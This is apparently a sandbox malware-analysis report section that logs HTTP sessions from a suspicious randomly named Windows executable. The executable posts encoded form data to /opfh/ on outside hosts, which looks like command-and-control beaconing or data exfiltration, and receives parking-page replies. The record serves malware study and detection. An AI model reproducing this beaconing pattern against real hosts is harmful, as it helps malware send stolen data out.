                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:46.049228907 CEST456OUTGET /opfh/?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.ukscan.co.uk
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:20:46.517323017 CEST419INHTTP/1.1 200 OK
                            Server: openresty
                            Date: Mon, 27 May 2024 10:20:46 GMT
                            Content-Type: text/html
                            Content-Length: 279
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 34 30 4c 36 3d 70 73 7a 2f 6c 51 4e 4a 48 6b 79 30 46 4f 58 67 59 44 6c 52 42 4f 33 31 75 2f 55 54 49 67 35 5a 37 4a 35 2f 76 47 71 6f 50 31 58 45 2b 73 38 74 72 32 43 36 37 71 58 69 43 71 67 73 62 64 37 50 68 42 6a 6e 2f 6c 4f 54 77 53 6e 76 54 70 49 67 62 38 67 62 35 55 79 69 77 47 49 56 38 31 70 59 34 78 65 66 4b 67 64 4e 33 39 63 65 6b 38 4c 41 72 67 53 4c 51 4e 33 58 31 77 66 54 42 38 77 7a 47 49 63 64 42 47 68 6c 39 7a 41 64 26 62 32 50 58 3d 68 5a 58 6c 37 56 46 50 4b 6c 30 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R40L6=psz/lQNJHky0FOXgYDlRBO31u/UTIg5Z7J5/vGqoP1XE+s8tr2C67qXiCqgsbd7PhBjn/lOTwSnvTpIgb8gb5UyiwGIV81pY4xefKgdN39cek8LArgSLQN3X1wfTB8wzGIcdBGhl9zAd&b2PX=hZXl7VFPKl04"}</script></head></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.763170199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:51.746674061 CEST714OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.swordshoop.ca
                            Origin: http://www.swordshoop.ca
                            Referer: http://www.swordshoop.ca/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 55 78 72 79 57 78 51 34 6a 33 43 49 62 32 6f 6b 54 76 78 66 43 76 76 53 72 57 53 76 34 63 76 39 63 71 45 62 71 79 50 56 34 56 4e 6f 4c 58 4f 62 6e 67 38 41 58 6c 52 79 4f 50 71 4f 72 67 58 6d 4a 6c 67 76 38 4b 37 65 6a 58 67 30 73 74 48 78 75 38 48 36 77 6d 44 57 4b 56 64 48 57 2b 72 4d 47 53 74 69 36 4d 53 38 4e 39 32 4f 4b 65 72 33 58 44 57 2f 55 4f 38 46 55 4f 39 37 35 54 48 46 6d 38 69 50 61 71 49 4a 31 33 56 32 51 4c 4e 59 2f 5a 54 42 6c 74 67 78 62 7a 4c 77 43 6a 72 42 51 49 47 4e 36 4e 31 66 49 2b 72 61 75 62 49 41 59 76 46 66 4b 37 61 54 49 6d 57 62 38 44 54 6d 50 42 61 38 2b 7a 66 36 65 30 2f 74 68 38 64 59 6b 41 3d 3d
                            Data Ascii: R40L6=UxryWxQ4j3CIb2okTvxfCvvSrWSv4cv9cqEbqyPV4VNoLXObng8AXlRyOPqOrgXmJlgv8K7ejXg0stHxu8H6wmDWKVdHW+rMGSti6MS8N92OKer3XDW/UO8FUO975THFm8iPaqIJ13V2QLNY/ZTBltgxbzLwCjrBQIGN6N1fI+raubIAYvFfK7aTImWb8DTmPBa8+zf6e0/th8dYkA==
                            May 27, 2024 12:20:52.199166059 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:20:51 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1118
                            x-request-id: 06139f7a-18f4-40bc-ab2b-855e8f74a17c
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g==
                            set-cookie: parking_session=06139f7a-18f4-40bc-ab2b-855e8f74a17c; expires=Mon, 27 May 2024 10:35:52 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 65 6c 56 56 2b 50 52 64 45 4d 51 79 39 62 75 62 44 4e 5a 71 78 4e 6a 69 51 37 32 2b 73 33 41 4c 6f 39 75 35 54 69 4e 72 55 56 45 33 4b 79 74 66 57 7a 69 4d 32 52 72 55 64 35 52 32 7a 6b 59 77 32 6b 42 4a 53 43 4e 4e 49 62 66 51 75 52 6f 66 62 74 73 32 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:20:52.199194908 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDYxMzlmN2EtMThmNC00MGJjLWFiMmItODU1ZThmNzRhMTdjIiwicGFnZV90aW1lIjoxNzE2ODA1Mj


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.763171199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:54.282757998 CEST734OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.swordshoop.ca
                            Origin: http://www.swordshoop.ca
                            Referer: http://www.swordshoop.ca/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 55 78 72 79 57 78 51 34 6a 33 43 49 61 58 59 6b 55 4d 4a 66 57 2f 76 54 33 6d 53 76 32 38 76 35 63 71 59 62 71 32 33 46 34 41 6c 6f 4f 46 57 62 6f 43 45 41 55 6c 52 79 57 66 71 58 6b 41 58 76 4a 6c 73 64 38 50 44 65 6a 58 6b 30 73 73 33 78 75 4e 48 39 77 32 44 59 53 6c 64 46 62 65 72 4d 47 53 74 69 36 4d 47 53 4e 39 2b 4f 4b 74 44 33 57 68 75 67 64 75 38 47 54 4f 39 37 39 54 48 42 6d 38 69 6d 61 72 56 75 31 31 74 32 51 4c 39 59 2b 4d 2f 43 38 39 67 2f 56 54 4b 4f 54 44 6d 66 55 4c 4b 46 2f 63 31 44 45 70 33 6e 76 74 56 69 43 4e 4a 7a 55 71 69 6f 4d 6b 79 74 72 6c 4f 54 4e 41 65 6b 7a 52 72 62 42 44 61 48 73 75 38 63 79 78 72 4d 71 69 73 53 56 58 42 65 41 43 42 74 61 76 41 53 6d 73 77 3d
                            Data Ascii: R40L6=UxryWxQ4j3CIaXYkUMJfW/vT3mSv28v5cqYbq23F4AloOFWboCEAUlRyWfqXkAXvJlsd8PDejXk0ss3xuNH9w2DYSldFberMGSti6MGSN9+OKtD3Whugdu8GTO979THBm8imarVu11t2QL9Y+M/C89g/VTKOTDmfULKF/c1DEp3nvtViCNJzUqioMkytrlOTNAekzRrbBDaHsu8cyxrMqisSVXBeACBtavASmsw=
                            May 27, 2024 12:20:54.745572090 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:20:54 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1118
                            x-request-id: 25be825d-8626-47a9-9a0b-3632227b223a
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g==
                            set-cookie: parking_session=25be825d-8626-47a9-9a0b-3632227b223a; expires=Mon, 27 May 2024 10:35:54 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 65 6c 56 56 2b 50 52 64 45 4d 51 79 39 62 75 62 44 4e 5a 71 78 4e 6a 69 51 37 32 2b 73 33 41 4c 6f 39 75 35 54 69 4e 72 55 56 45 33 4b 79 74 66 57 7a 69 4d 32 52 72 55 64 35 52 32 7a 6b 59 77 32 6b 42 4a 53 43 4e 4e 49 62 66 51 75 52 6f 66 62 74 73 32 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:20:54.745590925 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjViZTgyNWQtODYyNi00N2E5LTlhMGItMzYzMjIyN2IyMjNhIiwicGFnZV90aW1lIjoxNzE2ODA1Mj


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.763172199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:56.822839975 CEST1747OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.swordshoop.ca
                            Origin: http://www.swordshoop.ca
                            Referer: http://www.swordshoop.ca/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 55 78 72 79 57 78 51 34 6a 33 43 49 61 58 59 6b 55 4d 4a 66 57 2f 76 54 33 6d 53 76 32 38 76 35 63 71 59 62 71 32 33 46 34 47 39 6f 53 67 4b 62 6e 46 51 41 56 6c 52 79 49 50 71 53 6b 41 57 76 4a 6c 6c 57 38 50 47 72 6a 56 4d 30 74 4f 76 78 6f 2f 2f 39 2f 32 44 59 4f 56 64 41 57 2b 72 5a 47 53 39 6d 36 4d 57 53 4e 39 2b 4f 4b 6f 48 33 41 44 57 67 62 75 38 46 55 4f 39 33 35 54 48 70 6d 38 36 58 61 72 68 55 79 46 4e 32 4a 76 5a 59 7a 61 4c 43 30 39 68 5a 59 7a 4b 47 54 44 71 2b 55 4e 76 2b 2f 63 52 35 45 75 62 6e 75 70 55 2b 47 4d 56 76 47 37 6d 4b 47 79 69 56 67 47 71 67 41 7a 65 34 38 6a 6e 37 4d 7a 61 37 68 39 6f 69 35 45 58 4b 37 78 64 6e 4d 44 4a 34 57 69 35 69 4f 64 77 4c 33 62 6c 68 6b 50 37 72 66 4a 78 4d 41 5a 4d 59 4a 52 59 52 4a 55 51 47 54 62 44 66 5a 68 2b 50 6f 47 4a 30 5a 6c 6b 62 7a 48 69 50 4c 32 70 73 35 5a 39 63 6a 71 37 68 57 50 76 49 39 6e 78 4c 5a 52 43 52 34 31 44 44 52 59 64 66 36 52 52 51 54 63 77 66 67 70 5a 65 33 5a 6f 52 79 7a 55 6c 2f 41 33 43 54 5a 39 6a [TRUNCATED]
                            Data Ascii: R40L6=UxryWxQ4j3CIaXYkUMJfW/vT3mSv28v5cqYbq23F4G9oSgKbnFQAVlRyIPqSkAWvJllW8PGrjVM0tOvxo//9/2DYOVdAW+rZGS9m6MWSN9+OKoH3ADWgbu8FUO935THpm86XarhUyFN2JvZYzaLC09hZYzKGTDq+UNv+/cR5EubnupU+GMVvG7mKGyiVgGqgAze48jn7Mza7h9oi5EXK7xdnMDJ4Wi5iOdwL3blhkP7rfJxMAZMYJRYRJUQGTbDfZh+PoGJ0ZlkbzHiPL2ps5Z9cjq7hWPvI9nxLZRCR41DDRYdf6RRQTcwfgpZe3ZoRyzUl/A3CTZ9jx/Qb8ERzUT1siH3aGEehOs3YJLzE7NgUUzJCYIe3Amb7m5FW93Swg1KnWA1V3wMTZwCjWdw2l65Ytll9pHO42hbq5k0ibkLCRDbzG3aOnMEa+aTfTEhXOgf/IQbmLRhlXMYzpPS3VHQXnQS2TXd0KFKO5eOSHdm0zLlawkRpF5nbYRZgeWtSn/ra8W0Kjp3Ob4npKLbb+Kk3ODqQTVTiM5GaEVr9AL/zboNYxWMWxHHxo3OgPpbG3kR/M7CyTP20QViqtE5IjrEzPFzc2AVXIY4RtTDxGGgvLXb90Jv1w6f/aRJUixxNVnRTTUJiANYoxlEQuyekgzb/p9zekRrqdDfER2xeHpjpo13oxX/O1gjVMgm9HohUc6OdVYZ3usqWuQn7s+RltlRtLgy4Bltj5GMprJcuedXAqQbfgKbKrSyJY/BTixMHCGhj8ugPfcz9AN/4WLtUqp0dOP0VYPkT38VW+01j9PX4rzafgkNjNS0Hy/efrPsAcGVZcRcBtOmquT8T4m6TKqhy5othBDozmupETDmRNVKw9J5UwCKVqZW3PONFJFSuOyvZMgbLXhU5k87gmvUDC/6T8VhSFt6ThFnm2QHGyMaGXtQS2Q04qG73WalZH/WYvT9K5nSCBCXnkyyXsgn2Vu7zDEZkCOHBG92eHGbK6RZLsU [TRUNCATED]
                            May 27, 2024 12:20:57.289233923 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:20:57 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1118
                            x-request-id: f8dd8fa8-c8b6-4e9f-a219-e8272f214711
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g==
                            set-cookie: parking_session=f8dd8fa8-c8b6-4e9f-a219-e8272f214711; expires=Mon, 27 May 2024 10:35:57 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4c 65 6c 56 56 2b 50 52 64 45 4d 51 79 39 62 75 62 44 4e 5a 71 78 4e 6a 69 51 37 32 2b 73 33 41 4c 6f 39 75 35 54 69 4e 72 55 56 45 33 4b 79 74 66 57 7a 69 4d 32 52 72 55 64 35 52 32 7a 6b 59 77 32 6b 42 4a 53 43 4e 4e 49 62 66 51 75 52 6f 66 62 74 73 32 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_LelVV+PRdEMQy9bubDNZqxNjiQ72+s3ALo9u5TiNrUVE3KytfWziM2RrUd5R2zkYw2kBJSCNNIbfQuRofbts2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:20:57.289266109 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjhkZDhmYTgtYzhiNi00ZTlmLWEyMTktZTgyNzJmMjE0NzExIiwicGFnZV90aW1lIjoxNzE2ODA1Mj


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.763173199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:20:59.368424892 CEST457OUTGET /opfh/?R40L6=ZzDSVGEFmA6bbFgWUPABJOqYyGy556P6SvdRpmz0pldrPkLsuzUuLHkKP8ebqy61OUsJ3I6Wp1cSjumXpsr68z/GSQBLa7X+Wj1CzMiNU/mDF53obi6xM6x1cOBV2RrPtvioQYdy1WMq&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.swordshoop.ca
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:20:59.824805021 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:20:59 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1518
                            x-request-id: 0a9926c8-754a-4ab9-b46f-0f7c14dc2cb0
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_z3aFx855oL1OSsOkLQFd4EjwYH+1CT1qCI/8uVLnR2p9XgVtCESTAZ9y/v3DTjp/+FwDfonSilK8e7+Totre1w==
                            set-cookie: parking_session=0a9926c8-754a-4ab9-b46f-0f7c14dc2cb0; expires=Mon, 27 May 2024 10:35:59 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 33 61 46 78 38 35 35 6f 4c 31 4f 53 73 4f 6b 4c 51 46 64 34 45 6a 77 59 48 2b 31 43 54 31 71 43 49 2f 38 75 56 4c 6e 52 32 70 39 58 67 56 74 43 45 53 54 41 5a 39 79 2f 76 33 44 54 6a 70 2f 2b 46 77 44 66 6f 6e 53 69 6c 4b 38 65 37 2b 54 6f 74 72 65 31 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_z3aFx855oL1OSsOkLQFd4EjwYH+1CT1qCI/8uVLnR2p9XgVtCESTAZ9y/v3DTjp/+FwDfonSilK8e7+Totre1w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:20:59.824830055 CEST971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGE5OTI2YzgtNzU0YS00YWI5LWI0NmYtMGY3YzE0ZGMyY2IwIiwicGFnZV90aW1lIjoxNzE2ODA1Mj


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
